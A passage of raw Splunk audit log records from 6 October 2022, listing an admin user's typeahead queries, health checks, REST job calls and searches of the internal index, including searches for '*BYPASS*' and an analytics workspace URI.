is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_221b2aff35dcf04d", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal *BYPA" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:01:36.305, user=admin, action=search, info=canceled, search_id='ta_1665079218.19', has_error_warn=false, fully_completed_search=true, total_run_time=0.05, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079218, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_159ebc0ac613a716", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal *B" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:01:36.304, user=admin, action=search, info=canceled, search_id='ta_1665079218.21', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079218, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="9", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_2bbe342750d9cb01", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal *BYP" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:01:29.814, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:01:22.615, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/control] Audit:[timestamp=10-06-2022 18:01:19.938, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:01:09.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:01:07.625, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/control] Audit:[timestamp=10-06-2022 18:00:59.813, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:00:52.614, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/control] Audit:[timestamp=10-06-2022 18:00:49.815, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:00:39.809, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:00:37.620, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/control] Audit:[timestamp=10-06-2022 18:00:36.304, user=admin, action=search, info=completed, search_id='1665079222.25', has_error_warn=false, fully_completed_search=true, total_run_time=0.39, event_count=17, result_count=17, available_count=17, scan_count=14039, drop_count=0, exec_time=1665079222, api_et=1664992800.000000000, api_lt=1665079222.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079222.000000000, is_realtime=0, savedsearch_name="", search_startup_time="60", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_303134988f06fd1e", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=0, considered_events=14039, total_slices=25, decompressed_slices=33, duration.command.search.index=4, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=62, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, sourcetype_count__mongod=2, sourcetype_count__splunk_web_service=12, sourcetype_count__splunkd=2, sourcetype_count__splunkd_ui_access=1, roles='admin+power+user', search='search index=_internal *BYPASS*'] Audit:[timestamp=10-06-2022 18:00:29.813, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:00:22.635, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/timeline] Audit:[timestamp=10-06-2022 18:00:22.617, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:00:22.617, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:00:22.616, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25] Audit:[timestamp=10-06-2022 18:00:22.611, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/summary] Audit:[timestamp=10-06-2022 18:00:22.610, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/events] Audit:[timestamp=10-06-2022 18:00:22.562, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:00:22.469, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:00:22.469, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:00:22.468, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25] Audit:[timestamp=10-06-2022 18:00:22.457, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/events] Audit:[timestamp=10-06-2022 18:00:22.451, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/summary] Audit:[timestamp=10-06-2022 18:00:22.314, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:00:22.174, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:00:22.174, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:00:22.173, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25] Audit:[timestamp=10-06-2022 18:00:22.037, user=admin, action=quota,search_id=1665079222.25, elapsed_ms=1, cache_size=2] Audit:[timestamp=10-06-2022 18:00:22.036, user=admin, action=search, info=granted , search_id='1665079222.25', search='search index=_internal *BYPASS*', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:00:22 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:00:22.035, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:00:22.026, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:00:21.882, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:00:21.882, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:00:21.882, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:00:21.882, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:00:19.814, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:00:19.663, user=admin, action=search, info=granted , search_id='ta_1665079219.24', search='typeahead prefix="index=_internal *BYPASS" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:00:19.473, user=admin, action=search, info=granted , search_id='ta_1665079219.23', search='typeahead prefix="index=_internal *BYPAS" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:00:19.307, user=admin, action=search, info=granted , search_id='ta_1665079219.22', search='typeahead prefix="index=_internal *BYPA" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:00:18.990, user=admin, action=search, info=granted , search_id='ta_1665079218.21', search='typeahead prefix="index=_internal *BYP" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:00:18.774, user=admin, action=search, info=granted , search_id='ta_1665079218.20', search='typeahead prefix="index=_internal *BY" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:00:18.412, user=admin, action=search, info=granted , search_id='ta_1665079218.19', search='typeahead prefix="index=_internal *B" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:00:14.467, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/control] Audit:[timestamp=10-06-2022 18:00:09.807, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:00:06.304, user=admin, action=search, info=canceled, search_id='rt_md_1665079109.12', has_error_warn=true, fully_completed_search=true, total_run_time=29.02, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079109, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=1, savedsearch_name="", search_startup_time="50", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_d79d8decd779a2d3", app="search", provenance="UI:Search", mode="RT", is_proxied=false, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='| metadata type=sourcetypes | search totalCount > 0'] Audit:[timestamp=10-06-2022 17:59:59.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:59:59.468, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/control] Audit:[timestamp=10-06-2022 17:59:49.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:59:44.466, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/control] Audit:[timestamp=10-06-2022 17:59:39.817, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:59:36.307, user=admin, action=search, info=canceled, search_id='ta_1665079115.16', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=50, available_count=0, scan_count=0, drop_count=0, exec_time=1665079115, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="10", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_a78c1990350b4b57", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal u" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 17:59:36.307, user=admin, action=search, info=canceled, search_id='ta_1665079116.17', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=3, available_count=0, scan_count=0, drop_count=0, exec_time=1665079116, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="10", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_01cd904f6a00b00f", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal ur" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 17:59:36.306, user=admin, action=search, info=canceled, search_id='ta_1665079112.15', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079112, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="9", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_951f6dba2afb689f", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 17:59:36.305, user=admin, action=search, info=canceled, search_id='ta_1665079112.14', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079112, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="9", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_a285152fc7c84d8a", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="inde" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 17:59:36.304, user=admin, action=search, info=canceled, search_id='ta_1665079112.13', has_error_warn=false, fully_completed_search=true, total_run_time=0.02, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079112, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_20633332770c00cf", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="i" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 17:59:29.805, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:59:29.465, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/control] Audit:[timestamp=10-06-2022 17:59:19.808, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:59:14.470, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/control] Audit:[timestamp=10-06-2022 17:59:12.487, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/events] Audit:[timestamp=10-06-2022 17:59:09.808, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:59:06.305, user=admin, action=search, info=completed, search_id='1665079138.18', has_error_warn=false, fully_completed_search=true, total_run_time=0.15, event_count=4, result_count=4, available_count=4, scan_count=10, drop_count=0, exec_time=1665079138, api_et=1664989200.000000000, api_lt=1665079138.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664989200.000000000, search_lt=1665079138.000000000, is_realtime=0, savedsearch_name="", search_startup_time="128", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_f58836a106251897", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=1, considered_events=10, total_slices=21, decompressed_slices=3, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=22, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, sourcetype_count__splunk_web_access=2, sourcetype_count__splunkd_ui_access=2, roles='admin+power+user', search='search index=_internal uri=/en-US/app/search/analytics_workspace?sid*'] Audit:[timestamp=10-06-2022 17:58:59.938, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/timeline] Audit:[timestamp=10-06-2022 17:58:59.806, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:58:59.463, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:59.463, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:59.462, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18] Audit:[timestamp=10-06-2022 17:58:59.458, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/events] Audit:[timestamp=10-06-2022 17:58:59.458, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/summary] Audit:[timestamp=10-06-2022 17:58:59.377, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:58:59.312, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:59.312, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:59.311, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18] Audit:[timestamp=10-06-2022 17:58:59.300, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/events] Audit:[timestamp=10-06-2022 17:58:59.299, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18/summary] Audit:[timestamp=10-06-2022 17:58:59.150, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:58:59.009, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:59.009, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:59.008, user=admin, action=search, info=granted REST: /search/jobs/1665079138.18] Audit:[timestamp=10-06-2022 17:58:58.865, user=admin, action=quota,search_id=1665079138.18, elapsed_ms=1, cache_size=2] Audit:[timestamp=10-06-2022 17:58:58.864, user=admin, action=search, info=granted , search_id='1665079138.18', search='search index=_internal uri=/en-US/app/search/analytics_workspace?sid*', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 17:00:00 2022', apiEndTime='Thu Oct 6 17:58:58 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 17:58:58.864, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:58:58.856, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 17:58:58.698, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:58.698, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:58.698, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 17:58:58.698, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 17:58:58.550, user=admin, action=search, info=cancel, search_id='rt_md_1665079109.12'] Audit:[timestamp=10-06-2022 17:58:58.549, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:57.210, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:57.210, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:57.209, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:54.201, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:54.201, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:54.200, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:51.202, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:51.202, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:51.201, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:49.815, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:58:48.207, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:48.207, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:48.206, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:45.238, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:45.238, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:45.238, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:42.201, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:42.201, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:42.200, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:39.805, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:58:38.650, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:38.650, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:38.649, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:36.275, user=admin, action=search, info=granted , search_id='ta_1665079116.17', search='typeahead prefix="index=_internal ur" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:58:35.944, user=admin, action=search, info=granted , search_id='ta_1665079115.16', search='typeahead prefix="index=_internal u" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:58:35.920, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:35.920, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:35.920, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:34.047, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:34.047, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:34.046, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:32.860, user=admin, action=search, info=granted , search_id='ta_1665079112.15', search='typeahead prefix="index" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:58:32.765, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:32.765, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:32.764, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:32.656, user=admin, action=search, info=granted , 